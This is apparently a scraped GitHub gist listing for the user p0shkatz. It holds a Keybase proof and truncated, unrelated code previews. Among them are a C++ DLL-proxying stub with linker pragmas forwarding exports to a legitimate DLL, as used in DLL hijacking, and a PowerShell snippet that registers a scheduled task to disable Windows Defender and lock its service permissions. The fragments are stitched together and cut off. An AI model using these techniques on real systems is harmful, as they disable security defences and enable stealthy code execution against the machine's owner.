I hereby claim:
- I am p0shkatz on github.
- I am p0shkatz (https://keybase.io/p0shkatz) on keybase.
- I have a public key ASCktdQUYuSBTup_UWSLAihx_cZEuwIgYPrIjsEdl-QuHwo
To claim this, I am signing this object:
#include "pch.h" | |
#include <windows.h> | |
#include <string> | |
#include <iostream> | |
#pragma comment(linker, "/export:FunctionName1=C:\\\\path\\\\to\\\\legitDLL.FunctionName1") | |
#pragma comment(linker, "/export:FunctionName2=C:\\\\path\\\\to\\\\legitDLL.FunctionName2") | |
#pragma comment(linker, "/export:FunctionName3=C:\\\\path\\\\to\\\\legitDLL.FunctionName3") | |
#pragma comment(linker, "/export:FunctionName4=C:\\\\path\\\\to\\\\legitDLL.FunctionName4") | |
#pragma comment(linker, "/export:FunctionName5=C:\\\\path\\\\to\\\\legitDLL.FunctionName5") |
# from james forshaw | |
# | |
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() |
I hereby claim:
To claim this, I am signing this object:
# FileSystemWatcher.ps1 | |
# To stop the monitoring, run the following command: | |
# Get-EventSubscriber | Unregister-Event | |
# Log settings | |
$LogFilePath = "$env:userprofile\desktop\FileSystemWatcher.log" | |
# Execution settings | |
$patchexec = $false | |
# You will need to change this |
get-process;read-host \"Press enter\"; |